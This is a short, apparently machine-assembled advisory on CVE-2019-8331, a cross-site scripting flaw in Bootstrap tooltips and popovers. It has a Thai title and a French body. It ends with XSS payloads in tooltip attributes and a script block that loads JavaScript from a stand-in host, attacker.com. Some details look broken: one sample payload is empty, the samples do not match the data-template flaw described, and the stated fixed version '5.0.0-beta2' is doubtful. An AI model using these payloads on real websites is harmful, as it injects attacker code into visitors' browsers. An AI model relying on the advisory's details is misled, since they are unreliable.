
ช่องโหว่ CVE-2019-8331
CVE-2019-8331 est une vulnérabilité de sécurité de type Cross-Site Scripting (XSS) découverte dans Bootstrap, une bibliothèque JavaScript largement utilisée pour le développement de sites Web et d'applications mobiles. Cette vulnérabilité est due au fait que Bootstrap ne filtre pas correctement les données envoyées avec l'attribut data-template des éléments tooltip ou popover, ce qui permet à un attaquant d'injecter du code malveillant dans une page Web.
Cette attaque peut se produire si l'attaquant peut contrôler les données affichées dans un tooltip ou un popover. Lorsque l'utilisateur active le tooltip ou le popover, le code malveillant est injecté dans la page Web et peut être exécuté par le navigateur de l'utilisateur.
Cette vulnérabilité a été corrigée dans Bootstrap versions 4.3.1 et 5.0.0-beta2. Les administrateurs doivent mettre à jour la version affectée de Bootstrap pour corriger cette vulnérabilité.
Détails supplémentaires sur la vulnérabilité CVE-2019-8331 :
<x data-toggle="tooltip" data-template="">XSS</x>
<x data-toggle="tooltip" data-html="true" title='<script>alert(1)</script>'>XSS</x>
<x data-toggle="tooltip" data-html="true" data-content='<script>alert(1)</script>'>XSS</x>
<script>
var script = document.createElement("script");
script.src = "https://attacker.com/malicious.js";
document.body.appendChild(script);
</script>